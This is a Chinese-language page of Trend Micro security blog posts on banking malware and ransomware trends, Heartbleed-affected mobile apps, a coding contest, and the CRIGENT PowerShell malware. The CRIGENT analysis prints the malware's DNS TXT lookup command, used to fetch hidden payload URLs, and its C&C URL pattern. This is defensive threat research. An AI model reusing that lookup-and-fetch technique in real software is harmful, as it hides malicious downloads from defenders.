向錢看!金融惡意軟體:銀行木馬,勒索軟體不斷開發”新市場”

趨勢科技 TrendMicro

作者:趨勢科技全球安全研究副總裁Rik Ferguson

在2013年,所有媒體和資安研究的焦點都放在目標攻擊的狀況,以及有越來越多組織成為這類攻擊的犧牲品。你可能會認為傳統的使用者層級攻擊活動已經開始勢微了。那你就錯了,而且大錯特錯。

網路犯罪分子的目的還是為了要錢,他們不會管是透過針對商業活動的目標攻擊,還是大量散佈的垃圾郵件(SPAM)活動。他們會在任何可以找到的肥沃土地播下金融惡意軟體的種子。

去年銀行惡意軟體入侵電腦將近100萬次,且不斷開發新市場

趨勢科技在2013年看到銀行惡意軟體用著自2002年後就未曾見過的成長速度在散播著。趨勢科技在這一年裡攔截銀行木馬入侵使用者的電腦將近100萬次。分開來看,2013年的前三季分別是113,000次到220,000次之間,而在最後一季高達了537,000次。罪犯不僅是增加了攻擊數量,同時也在不斷擴大攻擊範圍。

向錢看!金融惡意軟體:銀行木馬,勒索軟體不斷開發”新市場”

 我們看到在某些國家數量的大幅增加,如日本和巴西躋身到前四名,並且也加入了新的目標,包括澳州、法國和德國。日本一般來說不是會出現大量銀行惡意軟體的國家,但我們在2013年第三季和第四季在那裡看到大量而廣泛的ZeuS攻擊活動。

在開發新「市場」之餘,銀行惡意軟體也在開發新技術。特別是在巴西,趨勢科技看到惡意CPL檔案(微軟Windows的控制面板檔案)數量顯著地在增加,內嵌在RTF文件檔裡,和我們之前比較熟悉的傳統附加為ZIP和RAR檔案來傳遞有所不同。

 

2013年勒索軟體年成長一倍,平均每季超過兩萬起攻擊

 不過這還不是全部的銀行惡意軟體。而且去年還有一個地方有著大量回報,那就是勒索軟體 Ransomware體,特別是Cryptolocker趨勢科技客戶偵測到的勒索軟體總數跟前年相較起來增加了一倍,每季平均約偵測到22,000起。當你考慮到每名受害者可能要支付高達300美元或等值貨幣以重新取得自己的資料,這顯然成為網路劫匪頗具潛力的收入來源。

Cryptolocker本身就是一種現有勒索軟體 Ransomware的進化,它改善了加密技術,使用更有效的尋找和加密動作。會在本地端將檔案處理的更難解析,Cryptolocker同時也會找到網路硬碟上的檔案加以加密。不再依賴於簡單的共享密碼來解密付贖金的檔案或系統,Cryptolocker使用公鑰加密,加上非常有效的密鑰長度,讓加密過的檔案幾乎不可能回復。這會讓更多受害者願意去交出現金來換回對自己非常重要的數位寶物。這時候就必須要考慮建置有效而定期的備份解決方案,比以往任何時候都更加重要。 繼續閱讀

< Heartbleed心淌血漏洞偵測工具 > 6000個行動應用App會讓你「心淌血」!趨勢科技「安全達人」替 Android 行動用戶把關

趨勢科技 TrendMicro

高風險App恐洩漏用戶個資      以「生活品味」與「娛樂」類為大宗 

heart bleed for install 0421     

【台北訊】繼上週揭露了會廣泛影響行動 App程式的 Heartbleed漏洞  、以及其可能造成的廣泛危害之後,趨勢科技今(17)日再度公布,目前全球已有高達6000 多種行動App受到波及,其中「生活品味」與「娛樂」App各佔13%,成為受害最嚴重的類別!此外,Android 4.1.1 版作業系統也會受到影響。趨勢科技表示,Heartbleed漏洞的危害遍及各類型的App,用戶應立即安裝可偵測Heartbleed漏洞的手機資安軟體,如趨勢科技安全達人」免費行動防護App等,並立即檢查已下載的App是否安全,才能避免個資或交易資訊被竊取。
heart bleed

趨勢科技資深技術顧問簡勝財表示:「 OpenSSL 加密軟體程式庫的 Heartbeat (心跳) 延伸功能被發現含有一個漏洞稱為Heartbleed漏洞) ,它存在於所有內含 Heartbeat 延伸功能的 OpenSSL 軟體。當伺服器遭此漏洞攻擊時,駭客就能讀取電腦記憶體當中的資料,而且完全不留任何痕跡。」Heartbleed漏洞對用戶造成的影響如下圖:

Heartbleed 500x1500-web_infographic

圖一、Heartbleed漏洞對用戶造成的影響

 

簡勝財進一步指出:「趨勢科技於上週揭露了Heartbleed漏洞後,一直持續監控中,我們發現目前有超過6000 多種 App 程式受到影響,而且遍及各種類型,尤其以『生活品味』和「娛樂」此兩種與消費者日常生活高度連結的App各佔13%為最大宗,為受波及的App類別中第一名!」

 

以下是前十名受波及的行動應用程式App類別:

 前十名受 heart bleed 漏洞波及的行動應用程式App類別

圖二:前十名受波及的行動應用程式 App類別

  繼續閱讀

針對 Word 和 Excel 檔案的病毒家族CRIGENT,利用Windows PowerShell執行惡意行為

趨勢科技 TrendMicro

利用Windows PowerShell感染 Word和 Excel檔案

惡意軟體已經針對 Word和 Excel檔案有好一段日子了,但趨勢科技最近看到一個新的惡意軟體家族 – CRIGENT(也被稱為「Power Worm」)帶來了一些新的技術。(趨勢科技將這些檔案偵測為W97M_CRIGENT.JERX97M_CRIGENT.A。)

最引人注意的並不是建立或包含可執行程式碼,而是 CRIGENT 利用Windows PowerShell來執行其程序。PowerShell是一個功能強大的互動式 shell/腳本工具,可用在Windows的所有現行版本上(而且從Windows 7開始內建);該惡意軟體會透過PowerShell腳本來進行所有行為。因為IT管理員通常會找的是惡意二進位檔而可能會忽略掉它,因為使用這種技術的惡意軟體並不常見。

到達及其他組件

這種威脅會透過一個受感染的Word或Excel文件到達,可能是由其他惡意軟體所植入,或是經由使用者下載/存取。一旦打開,它會馬上從兩個著名的網路匿名專案下載另外兩個組件:Tor 網路以及Polipo,一個個人網頁快取/代理伺服器。

攻擊者會去掩飾這兩個檔案(經由變更它們的檔名),並且隱藏DNS記錄來掩蓋這些檔案的來源。這些檔案放在正常的雲端檔案儲存服務上(在此案例中是Dropbox和OneDrive)。這些檔案的網址被隱藏在DNS記錄中。這是如何做到的?

他會存取兩個不同網域的DNS記錄,並且在每個網域內建立一個子網域。不過他沒有將子網域對應到任何特定的IP地址。相反地,他儲存文字在DNS記錄中,再特別去查詢TXT記錄。(為了逃避本地端的DNS攔截,他會直接查詢Google的公共DNS伺服器),Windows內執行的命令是:

  • nslookup -querytype=TXT {malicious domain} 8.8.8.8

每兩個查詢都會帶回字串,包含了指向正常雲端儲存供應商的網址。其中一個連結指向Dropbox,另外一個指向微軟OneDrive。對於檢查網路流量而沒有查看實際檔案的人來說,只會看到一對連向Google公共DNS伺服器的DNS查詢,並從兩個著名的雲端服務下載檔案。兩者都沒有什麼可疑之處。

命令與控制

利用已安裝的Tor和Polipo軟體,它會存取其命令和控制伺服器。它所用的網址包含兩個GUID,如下所示:

  • {C&C server}/get.php?s=setup&mom={GUID #1}&uid={GUID #2}

 

奇怪的是,如果用缺少或不正確的GUID連上上述網站,C&C伺服器會出現下面這用德文所寫的輕微髒話:

 

圖一、C&C伺服器

繼續閱讀

趨勢科技Codinsanity亞太區程式競賽 開跑!橫跨亞太地區11國 挑戰大數據資料解決能力

趨勢科技 TrendMicro

歡迎大專院校學生及各路程式高手 前來挑戰

【2014年4月17日台北訊】全球雲端安全領導廠商趨勢科技今日宣布,一年一度的 Trend Micro Codinsanity 趨勢科技亞太區程式競賽將於4月21日正式起跑,歡迎學生與在職人士組隊報名。這個以培養軟體程式設計人才為主要目的跨國比賽,今年首度將賽事規模擴大至亞太地區11個國家,參賽對象除了大專院校學生之外,今年更將開放在職人士參加,一同角逐亞洲最佳軟體程式設計盟主的寶座!今年的比賽總獎金高達新台幣150萬,得獎學生並有機會獲得趨勢科技所提供的海外實習機會!

報名網址:https://contest.trendmicro.com/2014/tw/

award 得獎

 有鑑於現今行動裝置與社群媒體,已徹底改變了人們在居家、工作及生活場所中對於科技的應用方式,伴隨著巨量資料的興起,如何透過大數據(Big Data)分析技術、有效地增進數位生活的便利性及企業營運的新契機,將成為今年的比賽主題。趨勢科技Codinsanity亞太區程式競賽,將挑戰參賽者解決巨量資料問題的創意,不論是針對現有的演算法加以強化、開發新的演算法、或是探索新的解決方案以提升資料關聯性等,都可能是參賽者秀出其研發硬底子實力的最佳展現。

 

趨勢科技文化長暨共同創辦人陳怡蓁表示:「今日,我們正生活在一個雲端應用及資料驅動的時代,企業、政府機關的運作與人們的生活方式都已轉型。身為超過25 年經驗的全球雲端資訊安全領導企業,我們一直以巨量資料分析技術為中心,替個人及企業解決棘手的資訊安全問題。從台灣出發的趨勢科技,希望透過舉辦程式競賽,將趨勢研發工程師的全球實戰經驗與參賽的朋友分享,從而鼓勵並培養更多人才加入軟體產業的行列。我們相信亞洲將成為下一個領導資訊科技發展的新勢力,透過此國際級的競賽舞台,讓亞洲各國興趣相投、技術高超的人才齊聚一堂,一同解決真實世界的巨量資料問題,這也將是科技與軟體產業未來創新力、生產力與競爭力的基石。」

繼續閱讀

大約有 6,000 個行動應用程式,仍然受到 Heartbleed 漏洞影響

趨勢科技 TrendMicro

大約有6,000個應用程式仍然受 Heartbleed漏洞到影響,我們看到有很大一部分生活類的應用程式受到 Heartbleed漏洞 影響,這些應用程式包括了點餐、雜貨、設備、看書、優惠券、服裝、家具等等。也就是說,如果使用者透過其中一個受影響應用程式來點餐或買東西,跟訂單相關的資訊,像是使用者憑證和家裡地址,或更糟的是信用卡資料,都有可能被外洩。

Heartbleed

內建的OpenSSL程式庫讓應用程式和Android 4.1.1也會受到Heartbleed影響

趨勢科技之前的文章裡提到,行動應用程式也會受到Heartbleed漏洞的影響。這是因為行動應用程式可能會連上受漏洞影響的伺服器。不過看起來行動應用程式本身可能也會因為內建的OpenSSL程式庫而受此漏洞影響。

OpenSSL程式庫出現在Android 4.1.1和某些行動應用程式

們所擁有的資料顯示,雖然OpenSSL整合在Android系統內,但只有Android 4.1.1會受到Heartbleed漏洞影響。在此版本的設備上,任何會使用OpenSSL來建立SSL/TLS連線的應用程式都可能會受到影響,可能會被惡意份子用來從設備記憶體內擷取使用者資料。

然而,即使設備不是使用受影響的版本,也有可能因為應用程式本身而造成問題。我們在Google Play上發現了273個內建受影響版本的獨立OpenSSL程式庫,意味著這些應用程式可以在任何設備上受到危害。

在這份名單中,我們看到了去年最受歡迎的遊戲、一些VPN客戶端、一個安全應用程式、一個流行的影片播放程式、一個即時通應用程式、一個VOIP電話應用程式和其他許多軟體。正如你可能已經知道,OpenSSL程式庫被應用程式用來做為安全通訊之用。許多應用程式都來自知名的開發者。我們還發現此漏洞存在於舊版本的Google應用程式。

圖一、容易受到Heartbleed影響的包括那些極受歡迎的應用程式

 

這些應用程式會用靜態連結到有漏洞的OpenSSL程式庫,如下圖所示:

圖二、有漏洞的OpenSSL程式庫

 

如果應用程式所連上的遠端伺服器被入侵,那麼反向客戶端Heartbleed攻擊是有可能的。反向Heartbleed攻擊就會讓設備記憶體內容洩漏給攻擊者。該記憶體內容可能包含這些應用程式儲存在本地端的任何敏感資料。如果你使用有漏洞的VPN客戶端或VOIP網路電話應用程式來連上一個惡意服務,你可能會失去你的私鑰或其他憑證資料,那麼駭客就可以開始用來偽造你的身份和做其他不好的事情。 繼續閱讀